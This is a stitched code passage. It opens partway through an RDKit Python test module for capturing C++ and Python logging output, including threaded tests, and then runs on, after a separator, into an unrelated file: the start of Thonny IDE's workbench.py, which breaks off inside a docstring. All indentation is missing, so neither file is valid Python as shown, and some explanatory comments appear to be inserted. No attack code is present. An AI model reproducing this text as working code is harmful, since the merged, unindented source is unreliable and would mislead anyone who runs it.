setattr(sys, self.stream, self.old)
return self.new.getvalue()
class CaptureLogger(logging.Handler):
"""Helper class that captures Python logger output"""
def __init__(self, module=None):
super(CaptureLogger, self).__init__(level=logging.DEBUG)
self.logs = collections.defaultdict(str)
self.devnull = open(os.devnull, 'w')
rdkit.log_handler.setStream(self.devnull)
rdkit.logger.addHandler(self)
def handle(self, record):
key = record.levelname
val = self.format(record)
self.logs[key] += val
return False
def release(self):
rdkit.log_handler.setStream(sys.stderr)
rdkit.logger.removeHandler(self)
self.devnull.close()
return self.logs
class CaptureOutput:
"""Helper class that captures all output"""
def __init__(self):
self.captured = {}
def __enter__(self):
self.osout = CaptureStream(1)
self.oserr = CaptureStream(2)
self.pyout = CapturePython('stdout')
self.pyerr = CapturePython('stderr')
self.pylog = CaptureLogger()
return self.captured
def __exit__(self, x, y, z):
for key, output in self.pylog.release().items():
self.captured[key] = output
pyout = self.pyout.release()
if pyout:
self.captured['sys.stdout'] = pyout
pyerr = self.pyerr.release()
if pyerr:
self.captured['sys.stderr'] = pyerr
osout = self.osout.release()
if osout:
self.captured['std::cout'] = osout
oserr = self.oserr.release()
if oserr:
self.captured['std::cerr'] = oserr
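# Hedged usage note (illustrative, not part of the original tests):
# CaptureOutput is meant to be used as a context manager, e.g.
#
#   with CaptureOutput() as captured:
#       rdBase.LogWarningMsg("something happened")
#   # 'captured' then maps stream names such as 'std::cerr', 'sys.stderr'
#   # or 'WARNING' to the text that was emitted, depending on the active
#   # logging scheme.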
# Helpers for the non-threaded tests:
def timestamp(message):
ts = time.time()
if ts % 1 > 0.95:
# Avoid failures when seconds roll over:
time.sleep(0.06)
ts = time.time()
dt = datetime.datetime.fromtimestamp(ts)
return dt.strftime('[%H:%M:%S] ') + message
def expect_debug(message):
expect = timestamp(message)
rdBase.LogDebugMsg(message)
return expect
def expect_info(message):
expect = timestamp(message)
rdBase.LogInfoMsg(message)
return expect
def expect_warning(message):
expect = timestamp(message)
rdBase.LogWarningMsg(message)
return expect
def expect_error(message):
expect = timestamp(message)
rdBase.LogErrorMsg(message)
return expect
# Helpers for the threaded tests:
nthreads = 5
nlogs = 50
def go(func, *args):
thread = threading.Thread(target=func, args=args)
thread.start()
return thread
def LogDebugs(nlogs, t=1):
for i in range(1, nlogs+1):
rdBase.LogDebugMsg("Debug %d.%d: My dog has fleas!" % (t, i))
def LogInfos(nlogs, t=1):
for i in range(1, nlogs+1):
rdBase.LogInfoMsg("Info %d.%d: Everything is fine." % (t, i))
def LogWarnings(nlogs, t=1):
for i in range(1, nlogs+1):
rdBase.LogWarningMsg("Warning %d.%d: Every good boy does fine." % (t, i))
def LogErrors(nlogs, t=1):
for i in range(1, nlogs+1):
rdBase.LogErrorMsg("Error %d.%d: Intruder detected!" % (t, i))
def LogAllLevels(nlogs, t=1):
for i in range(1, nlogs+1):
rdBase.LogDebugMsg("Debug %d.%d: Headin' out..." % (t, i))
rdBase.LogInfoMsg("Info %d.%d: There is no cow level." % (t, i))
rdBase.LogWarningMsg("Warning %d.%d: Nuclear launch detected!" % (t, i))
rdBase.LogErrorMsg("Error %d.%d: We require more vespene gas." % (t, i))
def RunOneThreadPerLevel(nthreads):
threads = []
for i in range(1, nthreads+1):
threads.append(go(LogDebugs, nlogs, i))
threads.append(go(LogInfos, nlogs, i))
threads.append(go(LogErrors, nlogs, i))
threads.append(go(LogWarnings, nlogs, i))
for t in threads:
t.join()
def RunManyThreadsPerLevel(nthreads):
threads = []
for i in range(1, nthreads+1):
threads.append(go(LogAllLevels, nlogs, i))
for t in threads:
t.join()
class TestLogToCppStreams(unittest.TestCase):
@classmethod
def setUpClass(cls):
rdBase.LogToCppStreams()
def testDebug(self):
with CaptureOutput() as captured:
expect = expect_debug('debug') + '\n'
self.assertEqual(captured, {'std::cerr': expect})
def testInfo(self):
with CaptureOutput() as captured:
expect = expect_info('info') + '\n'
self.assertEqual(captured, {'std::cout': expect})
def testWarning(self):
with CaptureOutput() as captured:
expect = expect_warning('warning') + '\n'
self.assertEqual(captured, {'std::cerr': expect})
def testError(self):
with CaptureOutput() as captured:
expect = expect_error('error') + '\n'
self.assertEqual(captured, {'std::cerr': expect})
def testSynchronous(self):
with CaptureOutput() as captured:
LogAllLevels(nlogs)
cout = captured['std::cout']
cerr = captured['std::cerr']
self.assertEqual(cerr.count('Debug'), nlogs)
self.assertEqual(cout.count('Info'), nlogs)
self.assertEqual(cerr.count('Warning'), nlogs)
self.assertEqual(cerr.count('Error'), nlogs)
def testAsynchronous1(self):
with CaptureOutput() as captured:
RunOneThreadPerLevel(nthreads)
cout = captured['std::cout']
cerr = captured['std::cerr']
self.assertEqual(cerr.count('Debug'), nthreads * nlogs)
self.assertEqual(cout.count('Info'), nthreads * nlogs)
self.assertEqual(cerr.count('Warning'), nthreads * nlogs)
self.assertEqual(cerr.count('Error'), nthreads * nlogs)
def testAsynchronous2(self):
with CaptureOutput() as captured:
RunManyThreadsPerLevel(nthreads)
cout = captured['std::cout']
cerr = captured['std::cerr']
self.assertEqual(cerr.count('Debug'), nthreads * nlogs)
self.assertEqual(cout.count('Info'), nthreads * nlogs)
self.assertEqual(cerr.count('Warning'), nthreads * nlogs)
self.assertEqual(cerr.count('Error'), nthreads * nlogs)
class TestLogToPythonLogger(unittest.TestCase):
@classmethod
def setUpClass(cls):
rdBase.LogToPythonLogger()
def testDebug(self):
with CaptureOutput() as captured:
expect = expect_debug('debug')
self.assertEqual(captured, {'DEBUG': expect})
def testInfo(self):
with CaptureOutput() as captured:
expect = expect_info('info')
self.assertEqual(captured, {'INFO': expect})
def testWarning(self):
with CaptureOutput() as captured:
expect = expect_warning('warning')
self.assertEqual(captured, {'WARNING': expect})
def testError(self):
with CaptureOutput() as captured:
expect = expect_error('error')
self.assertEqual(captured, {'ERROR': expect})
def testSynchronous(self):
with CaptureOutput() as captured:
LogAllLevels(nlogs)
self.assertEqual(captured['DEBUG' ].count('Debug'), nlogs)
self.assertEqual(captured['INFO' ].count('Info'), nlogs)
self.assertEqual(captured['WARNING'].count('Warning'), nlogs)
self.assertEqual(captured['ERROR' ].count('Error'), nlogs)
def testAsynchronous1(self):
with CaptureOutput() as captured:
RunOneThreadPerLevel(nthreads)
self.assertEqual(captured['DEBUG' ].count('Debug'), nthreads * nlogs)
self.assertEqual(captured['INFO' ].count('Info'), nthreads * nlogs)
self.assertEqual(captured['WARNING'].count('Warning'), nthreads * nlogs)
self.assertEqual(captured['ERROR' ].count('Error'), nthreads * nlogs)
def testAsynchronous2(self):
with CaptureOutput() as captured:
RunManyThreadsPerLevel(nthreads)
self.assertEqual(captured['DEBUG' ].count('Debug'), nthreads * nlogs)
self.assertEqual(captured['INFO' ].count('Info'), nthreads * nlogs)
self.assertEqual(captured['WARNING'].count('Warning'), nthreads * nlogs)
self.assertEqual(captured['ERROR' ].count('Error'), nthreads * nlogs)
class TestLogToPythonStderr(unittest.TestCase):
@classmethod
def setUpClass(cls):
rdBase.LogToPythonStderr()
def testDebug(self):
with CaptureOutput() as captured:
expect = expect_debug('debug') + '\n'
self.assertEqual(captured, {'sys.stderr': expect})
def testInfo(self):
with CaptureOutput() as captured:
expect = expect_info('info') + '\n'
self.assertEqual(captured, {'sys.stderr': expect})
def testWarning(self):
with CaptureOutput() as captured:
expect = expect_warning('warning') + '\n'
self.assertEqual(captured, {'sys.stderr': expect})
def testError(self):
with CaptureOutput() as captured:
expect = expect_error('error') + '\n'
self.assertEqual(captured, {'sys.stderr': expect})
def testSynchronous(self):
with CaptureOutput() as captured:
LogAllLevels(nlogs)
output = captured['sys.stderr']
self.assertEqual(output.count('Debug'), nlogs)
self.assertEqual(output.count('Info'), nlogs)
self.assertEqual(output.count('Warning'), nlogs)
self.assertEqual(output.count('Error'), nlogs)
def testAsynchronous1(self):
with CaptureOutput() as captured:
RunOneThreadPerLevel(nthreads)
output = captured['sys.stderr']
self.assertEqual(output.count('Debug'), nthreads * nlogs)
self.assertEqual(output.count('Info'), nthreads * nlogs)
self.assertEqual(output.count('Warning'), nthreads * nlogs)
self.assertEqual(output.count('Error'), nthreads * nlogs)
def testAsynchronous2(self):
with CaptureOutput() as captured:
RunManyThreadsPerLevel(nthreads)
output = captured['sys.stderr']
self.assertEqual(output.count('Debug'), nthreads * nlogs)
self.assertEqual(output.count('Info'), nthreads * nlogs)
self.assertEqual(output.count('Warning'), nthreads * nlogs)
self.assertEqual(output.count('Error'), nthreads * nlogs)
class TestWrapLogs(unittest.TestCase):
@classmethod
def setUpClass(cls):
rdBase.LogToCppStreams()
rdBase.WrapLogs()
def testDebug(self):
with CaptureOutput() as captured:
expect = expect_debug('debug') + '\n'
self.assertEqual(captured, {
'sys.stderr': expect,
'std::cerr': expect
})
def testInfo(self):
with CaptureOutput() as captured:
expect = expect_info('info') + '\n'
self.assertEqual(captured, {
'sys.stderr': expect,
'std::cout': expect
})
def testWarning(self):
with CaptureOutput() as captured:
expect = expect_warning('warning') + '\n'
self.assertEqual(captured, {
'sys.stderr': expect,
'std::cerr': expect
})
def testError(self):
with CaptureOutput() as captured:
expect = expect_error('error') + '\n'
self.assertEqual(captured, {
'sys.stderr': expect,
'std::cerr': expect
})
if __name__ == '__main__': # pragma: nocover
unittest.main()
|
workbench.py
|
# -*- coding: utf-8 -*-
import ast
import collections
import importlib
import logging
import os.path
import pkgutil
import platform
import queue
import re
import socket
import sys
import tkinter as tk
import tkinter.font as tk_font
import traceback
import webbrowser
import gettext
from threading import Thread
from tkinter import ttk, messagebox
from typing import (
Any,
Callable,
Dict,
List,
Optional, # pylint: disable=unused-import
Sequence,
Set, # pylint: disable=unused-import
Tuple, # pylint: disable=unused-import
Type,
Union,
cast,
) # pylint: disable=unused-import
from warnings import warn
import thonny
from thonny import (
THONNY_USER_DIR,
get_runner,
running,
ui_utils,
assistance,
languages,
get_shell,
is_portable,
)
from thonny.code import EditorNotebook
from thonny.common import Record, UserError, normpath_with_actual_case
from thonny.config import try_load_configuration
from thonny.config_ui import ConfigurationDialog
from thonny.misc_utils import (
running_on_linux,
running_on_mac_os,
running_on_windows,
running_on_rpi,
copy_to_clipboard,
)
from thonny.running import BackendProxy, Runner
from thonny.shell import ShellView
from thonny.ui_utils import (
AutomaticNotebook,
AutomaticPanedWindow,
create_tooltip,
get_style_configuration,
lookup_style_option,
register_latin_shortcut,
select_sequence,
sequence_to_accelerator,
)
THONNY_PORT = 4957
SERVER_SUCCESS = "OK"
SINGLE_INSTANCE_DEFAULT = True
SIMPLE_MODE_VIEWS = ["ShellView"]
MenuItem = collections.namedtuple("MenuItem", ["group", "position_in_group", "tester"])
BackendSpec = collections.namedtuple(
"BackendSpec", ["name", "proxy_class", "description", "config_page_constructor", "sort_key"]
)
BasicUiThemeSettings = Dict[str, Dict[str, Union[Dict, Sequence]]]
CompoundUiThemeSettings = List[BasicUiThemeSettings]
UiThemeSettings = Union[BasicUiThemeSettings, CompoundUiThemeSettings]
FlexibleUiThemeSettings = Union[UiThemeSettings, Callable[[], UiThemeSettings]]
SyntaxThemeSettings = Dict[str, Dict[str, Union[str, int, bool]]]
FlexibleSyntaxThemeSettings = Union[SyntaxThemeSettings, Callable[[], SyntaxThemeSettings]]
OBSOLETE_PLUGINS = [
"thonnycontrib.pi",
"thonnycontrib.micropython",
"thonnycontrib.circuitpython",
"thonnycontrib.microbit",
]
class Workbench(tk.Tk):
"""
Thonny's main window and communication hub.
Is responsible for:
* creating the main window
* maintaining layout (_init_containers)
* loading plugins (_init_plugins, add_view, add_command)
* providing references to main components (editor_notebook and runner)
* communication between other components (see event_generate and bind)
* configuration services (get_option, set_option, add_defaults)
* loading translations
* maintaining fonts (named fonts, increasing and decreasing font size)
After workbench and plugins get loaded, 3 kinds of events start happening:
* User events (keypresses, mouse clicks, menu selections, ...)
* Virtual events (mostly via get_workbench().event_generate). These include:
events reported via and dispatched by Tk event system;
WorkbenchEvent-s, reported via and dispatched by enhanced get_workbench().event_generate.
* Events from the background process (program output notifications, input requests,
notifications about debugger's progress)
"""
def __init__(self, server_socket=None) -> None:
thonny._workbench = self
self._closing = False
self._destroyed = False
self._lost_focus = False
self._is_portable = is_portable()
self.initializing = True
tk.Tk.__init__(self, className="Thonny")
tk.Tk.report_callback_exception = self._on_tk_exception # type: ignore
self._event_handlers = {} # type: Dict[str, Set[Callable]]
self._images = (
set()
) # type: Set[tk.PhotoImage] # keep images here to avoid Python garbage collecting them,
self._default_image_mapping = (
{}
) # type: Dict[str, str] # to allow specify default alternative images
self._image_mapping_by_theme = (
{}
) # type: Dict[str, Dict[str, str]] # theme-based alternative images
self._current_theme_name = "clam" # will be overwritten later
self._backends = {} # type: Dict[str, BackendSpec]
self._commands = [] # type: List[Dict[str, Any]]
self._toolbar_buttons = {}
self._view_records = {} # type: Dict[str, Dict[str, Any]]
self.content_inspector_classes = [] # type: List[Type]
self._latin_shortcuts = {} # type: Dict[Tuple[int,int], List[Tuple[Callable, Callable]]]
self._init_configuration()
self._init_diagnostic_logging()
self._init_language()
self._active_ui_mode = os.environ.get("THONNY_MODE", self.get_option("general.ui_mode"))
self._init_scaling()
self._add_main_backends()
self._init_theming()
self._init_window()
self.add_view(ShellView, _("Shell"), "s", visible_by_default=True, default_position_key="A")
assistance.init()
self._runner = Runner()
self._load_plugins()
self._editor_notebook = None # type: Optional[EditorNotebook]
self._init_fonts()
self.reload_themes()
self._init_menu()
self._init_containers()
assert self._editor_notebook is not None
self._init_program_arguments_frame()
self._init_regular_mode_link()
self._show_views()
# Make sure ShellView is loaded
get_shell()
self._init_commands()
self._init_icon()
try:
self._editor_notebook.load_startup_files()
except Exception:
self.report_exception()
self._editor_notebook.focus_set()
self._try_action(self._open_views)
if server_socket is not None:
self._init_server_loop(server_socket)
self.bind_class("CodeViewText", "<<CursorMove>>", self.update_title, True)
self.bind_class("CodeViewText", "<<Modified>>", self.update_title, True)
self.bind_class("CodeViewText", "<<TextChange>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self.update_title, True)
self.bind_all("<KeyPress>", self._on_all_key_presses, True)
self.bind("<FocusOut>", self._on_focus_out, True)
self.bind("<FocusIn>", self._on_focus_in, True)
self._publish_commands()
self.initializing = False
self.event_generate("<<WorkbenchInitialized>>")
self._make_sanity_checks()
self.after(1, self._start_runner) # Show UI already before waiting for the backend to start
def _make_sanity_checks(self):
home_dir = os.path.expanduser("~")
bad_home_msg = None
if home_dir == "~":
bad_home_msg = "Can not find your home directory."
elif not os.path.exists(home_dir):
bad_home_msg = "Reported home directory (%s) does not exist." % home_dir
if bad_home_msg:
messagebox.showwarning(
"Problems with home directory",
bad_home_msg + "\nThis may cause problems for Thonny.",
)
def _try_action(self, action: Callable) -> None:
try:
action()
except Exception:
self.report_exception()
def _init_configuration(self) -> None:
self._configuration_manager = try_load_configuration(thonny.CONFIGURATION_FILE_NAME)
self._configuration_pages = []  # type: List[Tuple[str, str, Type[tk.Widget]]]
self.set_default("general.single_instance", SINGLE_INSTANCE_DEFAULT)
self.set_default("general.ui_mode", "simple" if running_on_rpi() else "regular")
self.set_default("general.debug_mode", False)
self.set_default("general.disable_notification_sound", False)
self.set_default("general.scaling", "default")
self.set_default("general.language", languages.BASE_LANGUAGE_CODE)
self.set_default("general.font_scaling_mode", "default")
self.set_default("run.working_directory", os.path.expanduser("~"))
def _init_language(self) -> None:
"""Initialize language."""
language_code = self.get_option("general.language")
if language_code in languages.LANGUAGES_DICT:
path = os.path.join(os.path.dirname(__file__), "locale")
language = gettext.translation("thonny", path, [language_code])
language.install()
def _get_logging_level(self) -> int:
if self.in_debug_mode():
return logging.DEBUG
else:
return logging.INFO
def _init_diagnostic_logging(self) -> None:
logFormatter = logging.Formatter("%(levelname)s: %(message)s")
root_logger = logging.getLogger()
log_file = os.path.join(THONNY_USER_DIR, "frontend.log")
file_handler = logging.FileHandler(log_file, encoding="UTF-8", mode="w")
file_handler.setFormatter(logFormatter)
file_handler.setLevel(self._get_logging_level())
root_logger.addHandler(file_handler)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(logFormatter)
console_handler.setLevel(self._get_logging_level())
root_logger.addHandler(console_handler)
root_logger.setLevel(self._get_logging_level())
import faulthandler
fault_out = open(os.path.join(THONNY_USER_DIR, "frontend_faults.log"), mode="w")
faulthandler.enable(fault_out)
def _init_window(self) -> None:
self.title("Thonny")
self.set_default("layout.zoomed", False)
self.set_default("layout.top", 15)
self.set_default("layout.left", 150)
if self.in_simple_mode():
self.set_default("layout.width", 1050)
self.set_default("layout.height", 700)
else:
self.set_default("layout.width", 800)
self.set_default("layout.height", 650)
self.set_default("layout.w_width", 200)
self.set_default("layout.e_width", 200)
self.set_default("layout.s_height", 200)
# I don't actually need saved options for Full screen/maximize view,
# but it's easier to create menu items, if I use configuration manager's variables
self.set_default("view.full_screen", False)
self.set_default("view.maximize_view", False)
# In order to avoid confusion set these settings to False
# even if they were True when Thonny was last run
self.set_option("view.full_screen", False)
self.set_option("view.maximize_view", False)
self.geometry(
"{0}x{1}+{2}+{3}".format(
min(max(self.get_option("layout.width"), 320), self.winfo_screenwidth()),
min(max(self.get_option("layout.height"), 240), self.winfo_screenheight()),
min(max(self.get_option("layout.left"), 0), self.winfo_screenwidth() - 200),
min(max(self.get_option("layout.top"), 0), self.winfo_screenheight() - 200),
)
)
if self.get_option("layout.zoomed"):
ui_utils.set_zoomed(self, True)
self.protocol("WM_DELETE_WINDOW", self._on_close)
self.bind("<Configure>", self._on_configure, True)
def _init_icon(self) -> None:
# Window icons
if running_on_linux() and ui_utils.get_tk_version_info() >= (8, 6):
self.iconphoto(True, self.get_image("thonny.png"))
else:
icon_file = os.path.join(self.get_package_dir(), "res", "thonny.ico")
try:
self.iconbitmap(icon_file, default=icon_file)
except Exception:
try:
# seems to work in mac
self.iconbitmap(icon_file)
except Exception:
pass
def _init_menu(self) -> None:
self.option_add("*tearOff", tk.FALSE)
if lookup_style_option("Menubar", "custom", False):
self._menubar = ui_utils.CustomMenubar(
self
) # type: Union[tk.Menu, ui_utils.CustomMenubar]
if self.get_ui_mode() != "simple":
self._menubar.grid(row=0, sticky="nsew")
else:
opts = get_style_configuration("Menubar")
if "custom" in opts:
del opts["custom"]
self._menubar = tk.Menu(self, **opts)
if self.get_ui_mode() != "simple":
self["menu"] = self._menubar
self._menus = {} # type: Dict[str, tk.Menu]
self._menu_item_specs = (
{}
) # type: Dict[Tuple[str, str], MenuItem] # key is pair (menu_name, command_label)
# create standard menus in correct order
self.get_menu("file", _("File"))
self.get_menu("edit", _("Edit"))
self.get_menu("view", _("View"))
self.get_menu("run", _("Run"))
self.get_menu("tempdevice", _("Device"))
self.get_menu("tools", _("Tools"))
self.get_menu("help", _("Help"))
def _load_plugins(self) -> None:
# built-in plugins
import thonny.plugins # pylint: disable=redefined-outer-name
self._load_plugins_from_path(
thonny.plugins.__path__, "thonny.plugins." # type: ignore
)
# 3rd party plugins from namespace package
try:
import thonnycontrib # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.__path__, "thonnycontrib.")
def _load_plugins_from_path(self, path: List[str], prefix: str) -> None:
load_function_name = "load_plugin"
modules = []
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[2]):
if module_name in OBSOLETE_PLUGINS:
logging.debug("Skipping plug-in %s", module_name)
else:
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
modules.append(m)
except Exception:
logging.exception("Failed loading plugin '" + module_name + "'")
def module_sort_key(m):
return getattr(m, "load_order_key", m.__name__)
for m in sorted(modules, key=module_sort_key):
getattr(m, load_function_name)()
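# Hedged note (illustrative): a discoverable plugin is simply a module under
# thonny.plugins or the thonnycontrib namespace package that defines a top-level
#
#   def load_plugin():
#       get_workbench().add_command(...)   # or add_view(), add_backend(), ...
#
# Candidate modules are imported and those defining load_plugin() are collected;
# load_plugin() is then called in load_order_key order (falling back to the
# module name).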
def _init_fonts(self) -> None:
# set up editor and shell fonts
self.set_default("view.io_font_family", "Courier" if running_on_mac_os() else "Courier New")
default_editor_family = "Courier New"
families = tk_font.families()
for family in ["Consolas", "Ubuntu Mono", "Menlo", "DejaVu Sans Mono"]:
if family in families:
default_editor_family = family
break
self.set_default("view.editor_font_family", default_editor_family)
if running_on_mac_os():
self.set_default("view.editor_font_size", 14)
self.set_default("view.io_font_size", 12)
elif self.in_simple_mode():
self.set_default("view.editor_font_size", 12)
self.set_default("view.io_font_size", 12)
else:
self.set_default("view.editor_font_size", 13)
self.set_default("view.io_font_size", 11)
default_font = tk_font.nametofont("TkDefaultFont")
if running_on_linux():
heading_font = tk_font.nametofont("TkHeadingFont")
heading_font.configure(weight="normal")
caption_font = tk_font.nametofont("TkCaptionFont")
caption_font.configure(weight="normal", size=default_font.cget("size"))
small_link_ratio = 0.8 if running_on_windows() else 0.7
self._fonts = [
tk_font.Font(
name="SmallLinkFont",
family=default_font.cget("family"),
size=int(default_font.cget("size") * small_link_ratio),
underline=True,
),
tk_font.Font(name="IOFont", family=self.get_option("view.io_font_family")),
tk_font.Font(
name="BoldIOFont", family=self.get_option("view.io_font_family"), weight="bold"
),
tk_font.Font(
name="UnderlineIOFont",
family=self.get_option("view.io_font_family"),
underline=True,
),
tk_font.Font(
name="ItalicIOFont", family=self.get_option("view.io_font_family"), slant="italic"
),
tk_font.Font(
name="BoldItalicIOFont",
family=self.get_option("view.io_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(name="EditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(name="SmallEditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(
name="BoldEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
),
tk_font.Font(
name="ItalicEditorFont",
family=self.get_option("view.editor_font_family"),
slant="italic",
),
tk_font.Font(
name="BoldItalicEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(
name="TreeviewFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
),
tk_font.Font(
name="BoldTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
weight="bold",
),
tk_font.Font(
name="ItalicTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
slant="italic",
),
tk_font.Font(
name="UnderlineTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
underline=1,
),
]
self.update_fonts()
def _add_main_backends(self) -> None:
self.set_default("run.backend_name", "SameAsFrontend")
self.set_default("CustomInterpreter.used_paths", [])
self.set_default("CustomInterpreter.path", "")
self.add_backend(
"SameAsFrontend",
running.SameAsFrontendCPythonProxy,
_("The same interpreter which runs Thonny (default)"),
running.get_frontend_python(),
"1",
)
from thonny import running_config_page
self.add_backend(
"CustomCPython",
running.CustomCPythonProxy,
_("Alternative Python 3 interpreter or virtual environment"),
running_config_page.CustomCPythonConfigurationPage,
"2",
)
self.add_backend(
"PrivateVenv",
running.PrivateVenvCPythonProxy,
_("A special virtual environment (deprecated)"),
_("This virtual environment is automatically maintained by Thonny.\n")
+ _("Location: ")
+ running.get_private_venv_path(),
"z",
)
def _start_runner(self) -> None:
try:
self.update_idletasks() # allow UI to complete
thonny._runner = self._runner
self._runner.start()
self._update_toolbar()
except Exception:
self.report_exception("Error when initializing backend")
def _init_server_loop(self, server_socket) -> None:
"""Socket will listen requests from newer Thonny instances,
which try to delegate opening files to older instance"""
self._requests_from_socket = queue.Queue() # type: queue.Queue[bytes]
def server_loop():
while True:
logging.debug("Waiting for next client")
(client_socket, _) = server_socket.accept()
try:
self._handle_socket_request(client_socket)
except Exception:
traceback.print_exc()
Thread(target=server_loop, daemon=True).start()
self._poll_socket_requests()
def _init_commands(self) -> None:
self.add_command(
"exit",
"file",
_("Exit"),
self._on_close,
default_sequence=select_sequence("<Alt-F4>", "<Command-q>", "<Control-q>"),
extra_sequences=["<Alt-F4>"]
if running_on_linux()
else ["<Control-q>"]
if running_on_windows()
else [],
)
self.add_command("show_options", "tools", _("Options..."), self.show_options, group=180)
self.createcommand("::tk::mac::ShowPreferences", self.show_options)
self.createcommand("::tk::mac::Quit", self._mac_quit)
self.add_command(
"increase_font_size",
"view",
_("Increase font size"),
lambda: self._change_font_size(1),
default_sequence=select_sequence("<Control-plus>", "<Command-Shift-plus>"),
extra_sequences=["<Control-KP_Add>"],
group=60,
)
self.add_command(
"decrease_font_size",
"view",
_("Decrease font size"),
lambda: self._change_font_size(-1),
default_sequence=select_sequence("<Control-minus>", "<Command-minus>"),
extra_sequences=["<Control-KP_Subtract>"],
group=60,
)
self.bind("<Control-MouseWheel>", self._cmd_zoom_with_mouse, True)
self.add_command(
"focus_editor",
"view",
_("Focus editor"),
self._cmd_focus_editor,
default_sequence=select_sequence("<Alt-e>", "<Command-Alt-e>"),
group=70,
)
self.add_command(
"focus_shell",
"view",
_("Focus shell"),
self._cmd_focus_shell,
default_sequence=select_sequence("<Alt-s>", "<Command-Alt-s>"),
group=70,
)
if self.get_ui_mode() == "expert":
self.add_command(
"toggle_maximize_view",
"view",
_("Maximize view"),
self._cmd_toggle_maximize_view,
flag_name="view.maximize_view",
default_sequence=None,
group=80,
)
self.bind_class("TNotebook", "<Double-Button-1>", self._maximize_view, True)
self.bind("<Escape>", self._unmaximize_view, True)
self.add_command(
"toggle_maximize_view",
"view",
_("Full screen"),
self._cmd_toggle_full_screen,
flag_name="view.full_screen",
default_sequence=select_sequence("<F11>", "<Command-Shift-F>"),
group=80,
)
if self.in_simple_mode():
self.add_command(
"font",
"tools",
_("Change font size"),
caption=_("Zoom"),
handler=self._toggle_font_size,
image="zoom",
include_in_toolbar=True,
)
self.add_command(
"quit",
"help",
_("Exit Thonny"),
self._on_close,
image="quit",
caption=_("Quit"),
include_in_toolbar=True,
group=101,
)
if self.in_debug_mode():
self.bind_all("<Control-Shift-Alt-D>", self._print_state_for_debugging, True)
def _print_state_for_debugging(self, event) -> None:
print(get_runner()._postponed_commands)
def _init_containers(self) -> None:
# Main frame functions as
# - a background behind the padding of main_pw; without this, OS X leaves a white border
# - a container to be hidden when a view is maximized and restored when the view goes back home
main_frame = ttk.Frame(self)
self._main_frame = main_frame
main_frame.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self._maximized_view = None # type: Optional[tk.Widget]
self._toolbar = ttk.Frame(main_frame, padding=0)
self._toolbar.grid(column=0, row=0, sticky=tk.NSEW, padx=10, pady=(5, 0))
self.set_default("layout.west_pw_width", self.scale(150))
self.set_default("layout.east_pw_width", self.scale(150))
self.set_default("layout.s_nb_height", self.scale(150))
self.set_default("layout.nw_nb_height", self.scale(150))
self.set_default("layout.sw_nb_height", self.scale(150))
self.set_default("layout.ne_nb_height", self.scale(150))
self.set_default("layout.se_nb_height", self.scale(150))
self._main_pw = AutomaticPanedWindow(main_frame, orient=tk.HORIZONTAL)
self._main_pw.grid(column=0, row=1, sticky=tk.NSEW, padx=10, pady=10)
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self._west_pw = AutomaticPanedWindow(
self._main_pw,
1,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.west_pw_width"),
)
self._center_pw = AutomaticPanedWindow(self._main_pw, 2, orient=tk.VERTICAL)
self._east_pw = AutomaticPanedWindow(
self._main_pw,
3,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.east_pw_width"),
)
self._view_notebooks = {
"nw": AutomaticNotebook(
self._west_pw, 1, preferred_size_in_pw=self.get_option("layout.nw_nb_height")
),
"w": AutomaticNotebook(self._west_pw, 2),
"sw": AutomaticNotebook(
self._west_pw, 3, preferred_size_in_pw=self.get_option("layout.sw_nb_height")
),
"s": AutomaticNotebook(
self._center_pw, 3, preferred_size_in_pw=self.get_option("layout.s_nb_height")
),
"ne": AutomaticNotebook(
self._east_pw, 1, preferred_size_in_pw=self.get_option("layout.ne_nb_height")
),
"e": AutomaticNotebook(self._east_pw, 2),
"se": AutomaticNotebook(
self._east_pw, 3, preferred_size_in_pw=self.get_option("layout.se_nb_height")
),
}
for nb_name in self._view_notebooks:
self.set_default("layout.notebook_" + nb_name + "_visible_view", None)
self._editor_notebook = EditorNotebook(self._center_pw)
self._editor_notebook.position_key = 1 # type: ignore
self._center_pw.insert("auto", self._editor_notebook)
def _init_theming(self) -> None:
self._style = ttk.Style()
self._ui_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleUiThemeSettings, Dict[str, str]]] # value is (parent, settings, images)
self._syntax_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleSyntaxThemeSettings]] # value is (parent, settings)
self.set_default("view.ui_theme", ui_utils.get_default_theme())
def add_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]] = None,
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences=False,
) -> None:
"""Registers an item to be shown in specified menu.
Args:
command_id: Unique string used for referring to this command
(e.g. in shortcut options and the toolbar button registry).
menu_name: Name of the menu the command should appear in.
Standard menu names are "file", "edit", "run", "view", "help".
If a menu with the given name doesn't exist, a new menu is created
(with label=name).
command_label: Label for this command
handler: Function to be called when the command is invoked.
Should be callable with one argument (the event or None).
tester: Function to be called for determining if command is available or not.
Should be callable with one argument (the event or None).
Should return True or False.
If None then command is assumed to be always available.
